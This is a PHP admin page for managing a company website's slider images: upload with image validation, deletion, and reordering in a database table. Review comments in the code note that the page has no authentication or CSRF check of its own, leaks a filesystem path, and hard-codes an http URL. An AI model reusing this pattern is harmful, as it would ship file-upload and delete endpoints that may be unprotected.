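<?php
// slider.php - Slider manager with sequence (move up/down)
//
// NOTE(review): every POST handler below runs before include/header.php is pulled in,
// and this file itself performs no login/session check and no CSRF-token check.
// Confirm that include/db.php (or the web server) enforces authentication for this
// page; if it does not, upload/delete/move are reachable without logging in.

// DEBUG - you can enable while debugging, but keep commented on production
// ini_set('display_errors', 1);
// ini_set('display_startup_errors', 1);
// error_reporting(E_ALL);

// ======= DB include =======
require_once 'include/db.php'; // must create $conn (mysqli instance)

if (!isset($conn) || !($conn instanceof mysqli)) {
    die("Database connection not found. Check include/db.php");
}

// ======= Paths =======
$uploadDirWeb = 'assets/images/slider/';        // path of the slider folder below this script
$uploadDirFs  = __DIR__ . '/' . $uploadDirWeb;  // filesystem path

// ensure folder exists
// NOTE(review): the failure message prints the absolute server path to the visitor.
if (!is_dir($uploadDirFs)) {
    if (!mkdir($uploadDirFs, 0755, true)) {
        die("Cannot create upload folder: $uploadDirFs. Check permissions.");
    }
}

// flash message (after redirect)
// The text comes from the query string, so it is escaped here and must stay escaped
// wherever it is printed. A non-string value (msg[]=...) is ignored instead of being
// handed to htmlspecialchars().
$flash = '';
if (isset($_GET['msg']) && is_string($_GET['msg'])) {
    $flash = htmlspecialchars($_GET['msg'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// ======= Helper: redirect with message =======
/**
 * Redirect back to this page (query string dropped) with a flash message, then stop.
 *
 * @param string $msg Plain-text message; URL-encoded here, HTML-escaped when displayed.
 */
function redirect_with_msg($msg)
{
    $path = strtok($_SERVER["REQUEST_URI"], '?'); // remove query
    // Defensive: keep exactly one leading slash so the Location value is always a
    // same-host path and can never be read as a protocol-relative URL ("//host/...").
    $path = '/' . ltrim((string) $path, '/');
    header('Location: ' . $path . '?msg=' . urlencode($msg));
    exit;
}

// ======= Handle Upload =======
// The upload form should include: <input type="hidden" name="action" value="upload_slide">
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'upload_slide') {

    // check file exists in POST
    if (!isset($_FILES['image'])) {
        redirect_with_msg('No file uploaded. Make sure file input name is "image" and form enctype="multipart/form-data".');
    }

    $file = $_FILES['image'];

    // check common upload errors
    // A multi-file submission (image[]) makes 'error' an array; treat that as an unknown error.
    $errCode = is_int($file['error']) ? $file['error'] : -1;
    if ($errCode !== UPLOAD_ERR_OK) {
        $map = [
            UPLOAD_ERR_INI_SIZE   => 'The uploaded file exceeds server limit.',
            UPLOAD_ERR_FORM_SIZE  => 'The uploaded file exceeds form limit.',
            UPLOAD_ERR_PARTIAL    => 'File was only partially uploaded.',
            UPLOAD_ERR_NO_FILE    => 'No file was uploaded.',
            UPLOAD_ERR_NO_TMP_DIR => 'Missing temporary folder on server.',
            UPLOAD_ERR_CANT_WRITE => 'Failed to write file to disk.',
            UPLOAD_ERR_EXTENSION  => 'A PHP extension stopped the file upload.',
        ];
        $msg = $map[$errCode] ?? 'Unknown upload error.';
        redirect_with_msg("Upload error: $msg");
    }

    // validate image using getimagesize
    // getimagesize() only inspects the image header; it does not prove the rest of the
    // file is harmless. The stored extension is therefore forced to an image type below,
    // and the web server should be configured not to execute scripts from $uploadDirFs.
    $imgInfo = @getimagesize($file['tmp_name']);
    if ($imgInfo === false) {
        redirect_with_msg('Invalid image file.');
    }

    // mime + extension whitelist
    $mimeToExt = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/webp' => 'webp',
        'image/gif'  => 'gif',
    ];
    $allowedExt = ['jpg', 'jpeg', 'png', 'webp', 'gif'];

    if (!isset($mimeToExt[$imgInfo['mime']])) {
        redirect_with_msg('Unsupported image type. Allowed: jpg, png, webp, gif.');
    }

    $clientExt = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($clientExt, $allowedExt, true)) {
        redirect_with_msg('Unsupported file extension.');
    }

    // The stored extension follows the detected content type, not the client-supplied
    // name, so the file on disk can never carry an extension that disagrees with it.
    $ext = $mimeToExt[$imgInfo['mime']];

    // size check (5MB)
    $maxBytes = 5 * 1024 * 1024;
    if ($file['size'] > $maxBytes) {
        redirect_with_msg('File too large. Max 5MB.');
    }

    // create unique filename and move (random rather than time-derived name)
    $newName = 'slide_' . bin2hex(random_bytes(8)) . '.' . $ext;
    $destFs  = $uploadDirFs . $newName;
    // Absolute URL saved in DB.
    // NOTE(review): scheme and host are hard-coded to plain http.
    $destWeb = 'http://admin.ramdevpcb.com/' . $uploadDirWeb . $newName;

    if (!move_uploaded_file($file['tmp_name'], $destFs)) {
        redirect_with_msg('Failed to move uploaded file. Check folder permissions.');
    }

    // set proper permissions for file
    @chmod($destFs, 0644);

    // compute next sequence (max + 1)
    $res = $conn->query("SELECT COALESCE(MAX(sequence), 0) + 1 AS next_seq FROM hero_slides");
    if ($res) {
        $row = $res->fetch_assoc();
        $nextSeq = (int) $row['next_seq'];
    } else {
        $nextSeq = 1;
    }

    // insert into DB
    $stmt = $conn->prepare("INSERT INTO hero_slides (image, sequence) VALUES (?, ?)");
    if (!$stmt) {
        @unlink($destFs); // cleanup
        redirect_with_msg('Server error (DB prepare failed).');
    }
    $stmt->bind_param('si', $destWeb, $nextSeq);
    if (!$stmt->execute()) {
        // Driver error text goes to the server log only; putting it in the redirect URL
        // would expose schema details in browser history, referrers and access logs.
        error_log('slider.php: slide insert failed: ' . $stmt->error);
        $stmt->close();
        @unlink($destFs);
        redirect_with_msg('Server error (DB insert failed).');
    }
    $stmt->close();

    redirect_with_msg('Slide uploaded successfully.');
}

// ======= Handle Delete =======
// The delete form should include: <input type="hidden" name="action" value="delete_slide">
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'delete_slide') {
    $id = (int) ($_POST['id'] ?? 0);
    if ($id <= 0) {
        redirect_with_msg('Invalid slide id.');
    }

    // fetch image path (use bind_result to avoid get_result dependency)
    $stmt = $conn->prepare("SELECT image FROM hero_slides WHERE id = ?");
    if (!$stmt) {
        redirect_with_msg('Server error (DB prepare failed).');
    }
    $stmt->bind_param('i', $id);
    if (!$stmt->execute()) {
        $stmt->close();
        redirect_with_msg('Server error (DB query failed).');
    }
    $stmt->bind_result($imagePath);
    $found = $stmt->fetch();
    $stmt->close();

    if (!$found || empty($imagePath)) {
        redirect_with_msg('Slide not found.');
    }

    // Locate the file on disk. The upload handler stores an absolute URL, so joining the
    // stored value onto __DIR__ never resolves and the image was never removed. Only the
    // file name is taken from the stored value and it is looked up inside the slider folder.
    $urlPath  = parse_url($imagePath, PHP_URL_PATH);
    $fileName = is_string($urlPath) ? basename($urlPath) : '';
    $fileFs   = $fileName !== '' ? realpath($uploadDirFs . $fileName) : false;
    $dirFs    = realpath($uploadDirFs);

    // ensure the file is inside uploadDirFs (safety)
    // The prefix carries a trailing separator so a sibling folder whose name merely starts
    // with the slider folder's name cannot pass the containment check.
    $safeUnlink = false;
    if ($fileFs !== false && $dirFs !== false) {
        $dirPrefix  = rtrim($dirFs, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        $safeUnlink = strncmp($fileFs, $dirPrefix, strlen($dirPrefix)) === 0 && is_file($fileFs);
    }
    // when the path is not inside the slider folder: don't unlink, but still delete DB record

    // delete DB record
    $del = $conn->prepare("DELETE FROM hero_slides WHERE id = ?");
    if (!$del) {
        redirect_with_msg('Server error (DB prepare failed).');
    }
    $del->bind_param('i', $id);
    if (!$del->execute()) {
        error_log('slider.php: slide delete failed: ' . $del->error);
        $del->close();
        redirect_with_msg('Server error (DB delete failed).');
    }
    $del->close();

    // delete file if safe
    if ($safeUnlink) {
        @unlink($fileFs);
    }

    redirect_with_msg('Slide removed.');
}

// ======= Handle Move (up/down) =======
// The move form should include: <input type="hidden" name="action" value="move_slide"> and fields id and dir(up/down)
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action']) && $_POST['action'] === 'move_slide') {
    $id  = (int) ($_POST['id'] ?? 0);
    $dir = ($_POST['dir'] ?? '');
    if ($id <= 0 || ($dir !== 'up' && $dir !== 'down')) {
        redirect_with_msg('Invalid move parameters.');
    }

    // get current sequence
    $stmt = $conn->prepare("SELECT sequence FROM hero_slides WHERE id = ?");
    if (!$stmt) {
        redirect_with_msg('Server error (DB prepare failed).');
    }
    $stmt->bind_param('i', $id);
    if (!$stmt->execute()) {
        $stmt->close();
        redirect_with_msg('Server error (DB query failed).');
    }
    $stmt->bind_result($seq);
    $found = $stmt->fetch();
    $stmt->close();
    if (!$found) {
        redirect_with_msg('Slide not found.');
    }

    // up: find previous (smaller sequence); down: find next (greater sequence)
    $neighbourSql = $dir === 'up'
        ? "SELECT id, sequence FROM hero_slides WHERE sequence < ? ORDER BY sequence DESC LIMIT 1"
        : "SELECT id, sequence FROM hero_slides WHERE sequence > ? ORDER BY sequence ASC LIMIT 1";

    $stmt = $conn->prepare($neighbourSql);
    // prepare() must be checked before bind_param(); calling a method on false is a fatal error
    if (!$stmt) {
        redirect_with_msg('Server error (DB prepare failed).');
    }
    $stmt->bind_param('i', $seq);
    if (!$stmt->execute()) {
        $stmt->close();
        redirect_with_msg('Server error (DB query failed).');
    }
    $stmt->bind_result($otherId, $otherSeq);
    $foundOther = $stmt->fetch();
    $stmt->close();

    if (!$foundOther) {
        // already top/bottom - nothing to do
        redirect_with_msg('Already at the ' . ($dir === 'up' ? 'top' : 'bottom') . '.');
    }

    // swap sequences inside transaction
    $conn->begin_transaction();
    try {
        $u1 = $conn->prepare("UPDATE hero_slides SET sequence = ? WHERE id = ?");
        if (!$u1) {
            throw new Exception('DB prepare failed (u1)');
        }
        $u1->bind_param('ii', $otherSeq, $id);
        if (!$u1->execute()) {
            throw new Exception('Update failed (u1): ' . $u1->error);
        }
        $u1->close();

        $u2 = $conn->prepare("UPDATE hero_slides SET sequence = ? WHERE id = ?");
        if (!$u2) {
            throw new Exception('DB prepare failed (u2)');
        }
        $u2->bind_param('ii', $seq, $otherId);
        if (!$u2->execute()) {
            throw new Exception('Update failed (u2): ' . $u2->error);
        }
        $u2->close();

        $conn->commit();
        redirect_with_msg('Slide moved ' . ($dir === 'up' ? 'up' : 'down') . '.');
    } catch (Exception $e) {
        $conn->rollback();
        // full detail stays in the server log; the visitor gets a generic message
        error_log('slider.php: slide move failed: ' . $e->getMessage());
        redirect_with_msg('Move failed.');
    }
}
?>
<!doctype html>
<html lang="en" dir="ltr">

<head>
    <!-- META DATA -->
    <meta charset="UTF-8">
    <meta name='viewport' content='width=device-width, initial-scale=1.0, user-scalable=0'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="Ramdev PCB Admin">
    <meta name="author" content="Ramdev PCB Admin">
    <meta name="keywords" content="Ramdev PCB">

    <!-- FAVICON -->
    <link rel="shortcut icon" type="image/x-icon" href="assets/images/brand/favicon.ico" />

    <!-- TITLE -->
    <title>Slider Ramdev PCB </title>

    <!-- BOOTSTRAP CSS -->
    <link id="style" href="assets/plugins/bootstrap/css/bootstrap.min.css" rel="stylesheet" />

    <!-- STYLE CSS -->
    <link href="assets/css/style.css" rel="stylesheet" />
    <link href="assets/css/dark-style.css" rel="stylesheet" />
    <link href="assets/css/transparent-style.css" rel="stylesheet">
    <link href="assets/css/skin-modes.css" rel="stylesheet" />

    <!--- FONT-ICONS CSS -->
    <link href="assets/css/icons.css" rel="stylesheet" />

    <!-- COLOR SKIN CSS -->
    <link id="theme" rel="stylesheet" type="text/css" media="all" href="assets/colors/color1.css" />
</head>

<body class="app sidebar-mini ltr light-mode">

    <!-- PAGE -->
    <div class="page">
        <div class="page-main">

            <!-- app-Header -->
            <?php include('include/header.php');?>

            <!--APP-SIDEBAR-->
            <?php include('include/sidebarmenu.php');?>

            <!--app-content open-->
            <div class="main-content app-content mt-0">
                <div class="side-app">

                    <!-- CONTAINER -->
                    <div class="main-container container-fluid">

                        <!-- PAGE-HEADER -->
                        <div class="page-header">
                            <h1 class="page-title">Slider</h1>
                            <div>
                                <ol class="breadcrumb">
                                    <li class="breadcrumb-item"><a href="javascript:void(0)">Home</a></li>
                                    <li class="breadcrumb-item active" aria-current="page">Slider</li>
                                </ol>
                            </div>
                        </div>
                        <!-- PAGE-HEADER END -->

                        <!-- Slider Management Card -->
                        <div class="row">
                            <div class="col-md-12">
                                <div class="card">
                                    <div class="card-header"><h3 class="card-title">Manage Slider Images</h3></div>
                                    <div class="card-body">

                                        <?php /* $flash was HTML-escaped when it was read from the query string */ ?>
                                        <?php if (!empty($flash)): ?>
                                            <div class="alert alert-info"><?= $flash ?></div>
                                        <?php endif; ?>

                                        <!-- Upload form -->
                                        <form method="post" enctype="multipart/form-data" class="mb-4">
                                            <input type="hidden" name="action" value="upload_slide">
                                            <div class="row">
                                                <div class="col-md-6">
                                                    <input type="file" name="image" accept="image/*" required class="form-control" />
                                                </div>
                                                <div class="col-md-2">
                                                    <button class="btn btn-primary" type="submit">Upload</button>
                                                </div>
                                            </div>
                                            <small class="form-text text-muted">Size: 1300px X 500px | Max 5MB | Allowed: jpg, png, webp, gif.</small>
                                        </form>

                                        <!-- Existing slides list -->
                                        <div class="row">
                                            <?php
                                            $res = $conn->query("SELECT id, image, sequence FROM hero_slides ORDER BY sequence ASC, id ASC");
                                            if ($res && $res->num_rows > 0) {
                                                while ($s = $res->fetch_assoc()) {
                                                    // every value printed into the markup is escaped or cast to int first
                                                    $img = htmlspecialchars($s['image'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
                                                    $id  = (int) $s['id'];
                                                    $seq = (int) $s['sequence'];
                                            ?>
                                            <div class="col-sm-3 mb-3">
                                                <div class="card">
                                                    <img src="<?= $img ?>" class="card-img-top" style="height:150px; object-fit:cover;" alt="slide">
                                                    <div class="card-body p-2 text-center">
                                                        <div class="d-flex justify-content-between align-items-center">
                                                            <form method="post" onsubmit="return confirm('Delete this slide?');" style="display:inline;">
                                                                <input type="hidden" name="action" value="delete_slide">
                                                                <input type="hidden" name="id" value="<?= $id ?>">
                                                                <button type="submit" class="btn btn-sm btn-danger">Remove</button>
                                                            </form>
                                                            <div>
                                                                <form method="post" style="display:inline;">
                                                                    <input type="hidden" name="action" value="move_slide">
                                                                    <input type="hidden" name="id" value="<?= $id ?>">
                                                                    <input type="hidden" name="dir" value="up">
                                                                    <button type="submit" class="btn btn-sm btn-secondary" <?= $seq === 1 ? 'disabled' : '' ?>>↑</button>
                                                                </form>
                                                                <form method="post" style="display:inline;">
                                                                    <input type="hidden" name="action" value="move_slide">
                                                                    <input type="hidden" name="id" value="<?= $id ?>">
                                                                    <input type="hidden" name="dir" value="down">
                                                                    <button type="submit" class="btn btn-sm btn-secondary">↓</button>
                                                                </form>
                                                            </div>
                                                        </div>
                                                        <div class="mt-2">
                                                            <small class="text-muted">Sequence: <?= $seq ?></small>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <?php
                                                }
                                            } else {
                                                echo '<div class="col-12"><em>No slides uploaded yet.</em></div>';
                                            }
                                            ?>
                                        </div>

                                    </div>
                                </div>
                            </div>
                        </div>

                    </div>
                    <!-- CONTAINER END -->
                </div>
            </div>
            <!--app-content close-->

        </div>

        <!-- FOOTER -->
        <?php include('include/footer.php');?>
        <!-- FOOTER END -->

    </div>

    <!-- BACK-TO-TOP -->
    <a href="#top" id="back-to-top"><i class="fa fa-angle-up"></i></a>

    <!-- JQUERY JS -->
    <script src="assets/js/jquery.min.js"></script>

    <!-- BOOTSTRAP JS -->
    <script src="assets/plugins/bootstrap/js/popper.min.js"></script>
    <script src="assets/plugins/bootstrap/js/bootstrap.min.js"></script>

    <!-- SPARKLINE JS-->
    <script src="assets/js/jquery.sparkline.min.js"></script>

    <!-- Sticky js -->
    <script src="assets/js/sticky.js"></script>

    <!-- CHART-CIRCLE JS-->
    <script src="assets/js/circle-progress.min.js"></script>

    <!-- PIETY CHART JS-->
    <script src="assets/plugins/peitychart/jquery.peity.min.js"></script>
    <script src="assets/plugins/peitychart/peitychart.init.js"></script>

    <!-- SIDEBAR JS -->
    <script src="assets/plugins/sidebar/sidebar.js"></script>

    <!-- Perfect SCROLLBAR JS-->
    <script src="assets/plugins/p-scroll/perfect-scrollbar.js"></script>
    <script src="assets/plugins/p-scroll/pscroll.js"></script>
    <script src="assets/plugins/p-scroll/pscroll-1.js"></script>

    <!-- INTERNAL CHARTJS CHART JS-->
    <script src="assets/plugins/chart/Chart.bundle.js"></script>
    <script src="assets/plugins/chart/rounded-barchart.js"></script>
    <script src="assets/plugins/chart/utils.js"></script>

    <!-- INTERNAL SELECT2 JS -->
    <script src="assets/plugins/select2/select2.full.min.js"></script>

    <!-- INTERNAL Bootstrap-Datepicker js-->
    <script src="assets/plugins/bootstrap-datepicker/bootstrap-datepicker.js"></script>

    <!-- DATEPICKER JS -->
    <script src="assets/plugins/date-picker/date-picker.js"></script>
    <script src="assets/plugins/date-picker/jquery-ui.js"></script>
    <script src="assets/plugins/input-mask/jquery.maskedinput.js"></script>

    <!-- INTERNAL Data tables js-->
    <script src="assets/plugins/datatable/js/jquery.dataTables.min.js"></script>
    <script src="assets/plugins/datatable/js/dataTables.bootstrap5.js"></script>
    <script src="assets/plugins/datatable/js/dataTables.buttons.min.js"></script>
    <script src="assets/plugins/datatable/js/buttons.bootstrap5.min.js"></script>
    <script src="assets/plugins/datatable/js/jszip.min.js"></script>
    <script src="assets/plugins/datatable/pdfmake/pdfmake.min.js"></script>
    <script src="assets/plugins/datatable/pdfmake/vfs_fonts.js"></script>
    <script src="assets/plugins/datatable/js/buttons.html5.min.js"></script>
    <script src="assets/plugins/datatable/js/buttons.print.min.js"></script>
    <script src="assets/plugins/datatable/js/buttons.colVis.min.js"></script>
    <script src="assets/plugins/datatable/dataTables.responsive.min.js"></script>
    <script src="assets/plugins/datatable/responsive.bootstrap5.min.js"></script>
    <script src="assets/js/table-data.js"></script>

    <!-- INTERNAL APEXCHART JS -->
    <script src="assets/js/apexcharts.js"></script>
    <script src="assets/plugins/apexchart/irregular-data-series.js"></script>

    <!-- C3 CHART JS -->
    <script src="assets/plugins/charts-c3/d3.v5.min.js"></script>
    <script src="assets/plugins/charts-c3/c3-chart.js"></script>

    <!-- CHART-DONUT JS -->
    <script src="assets/js/charts.js"></script>

    <!-- INTERNAL Flot JS -->
    <script src="assets/plugins/flot/jquery.flot.js"></script>
    <script src="assets/plugins/flot/jquery.flot.fillbetween.js"></script>
    <script src="assets/plugins/flot/chart.flot.sampledata.js"></script>
    <script src="assets/plugins/flot/dashboard.sampledata.js"></script>

    <!-- INTERNAL Vector js -->
    <script src="assets/plugins/jvectormap/jquery-jvectormap-2.0.2.min.js"></script>
    <script src="assets/plugins/jvectormap/jquery-jvectormap-world-mill-en.js"></script>

    <!-- SIDE-MENU JS-->
    <script src="assets/plugins/sidemenu/sidemenu.js"></script>

    <!-- INTERNAL INDEX JS -->
    <script src="assets/js/index1.js"></script>

    <!-- Color Theme js -->
    <script src="assets/js/themeColors.js"></script>

    <!-- CUSTOM JS -->
    <script src="assets/js/custom.js"></script>

</body>

</html>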